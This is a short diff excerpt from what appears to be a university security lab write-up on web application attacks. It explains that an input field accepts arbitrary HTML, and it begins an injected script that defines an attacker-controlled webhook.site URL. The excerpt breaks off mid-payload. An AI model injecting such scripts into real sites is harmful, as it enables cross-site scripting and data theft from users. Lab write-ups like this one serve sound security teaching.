kfernandez31/BSK-1-Web-Applications/writeup.md

 ```
 where `<CONTENTS>` is whatever whe enter in the field, naturally it has to be [url-encoded](https://www.urlencoder.org/).

 By viewing the input box's HTML it's evident that one can input any valid HTML, there's also no need for the enclosing `<p>` tags.
-So why not try some simple JS?
+So why not try some simple JS that pings a webhook of ours?
 ```html
 <script>
    const webhook = 'https://webhook.site/82310b30-bdb3-45f9-8d46-92f9c44fcf0d';